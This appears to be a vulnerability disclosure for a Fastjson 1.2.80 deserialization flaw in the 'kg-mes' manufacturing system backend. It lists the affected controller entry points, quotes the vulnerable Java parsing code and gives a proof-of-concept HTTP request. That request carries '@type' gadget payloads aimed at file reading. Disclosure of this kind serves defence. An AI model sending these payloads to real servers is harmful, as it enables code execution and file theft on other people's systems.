### Critical Vulnerability Information #### Vulnerability Type Fastjson Deserialization Vulnerability #### Affected Versions - Fastjson Version: 1.2.80 #### Vulnerability Description A Fastjson deserialization vulnerability exists in the `kg-mes` backend, which can be exploited to execute arbitrary code or read files. #### Vulnerable Code Example ```java // com.ktg.generator.controller.GenController#editSave @PutMapping public AjaxResult editSave(@Validated @RequestBody GenTable genTable) { genTableService.validateEdit(genTable); genTableService.updateGenTable(genTable); return AjaxResult.success(); } // com.ktg.generator.service.IGenTableService#validateEdit public void validateEdit(GenTable genTable) { if (GenConstants.TPL_TREE.equals(genTable.getTplCategory())) { String options = JSON.toJSONString(genTable.getParams()); JSONObject paramsObj = JSONObject.parseObject(options); if (StringUtils.isEmpty(paramsObj.getString(GenConstants.TREE_CODE))) { throw new ServiceException("Tree code field cannot be empty"); } } } ``` #### Similar Vulnerability Entry Points - `com.ktg.generator.controller.GenController#editSave` - `com.ktg.mes.wm.controller.mobile.WmStockTakingMobController#add` - `com.ktg.mes.wm.controller.mobile.WmStockTakingMobController#edit` - `com.ktg.mes.wm.controller.WmStockTakingController#add` - `com.ktg.mes.wm.controller.WmStockTakingController#edit` #### PoC Example ```http PUT /dev-api/tool/gen HTTP/1.1 Host: 10.157.131.188 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Admin-Token=eyJhb... Authorization: Bearer eyJhbGciOiJIUzUxMiJ9... Referer: http://10.157.131.188/tool/gen Content-Type: application/json { "aaa": "test", "tableName": "1", "tableComment": "2", "className": "3", "packageName": "4", "moduleName": "5", "functionName": "6", "functionAuthor": "7", "params": { "a": "{\"@type\": java.lang.Exception}", "b": {}, "c": "{}", "d": {} }, "abc": { "@type": "java.io.InputStream", "@type": "org.apache.commons.io.input.BOMInputStream" } } ```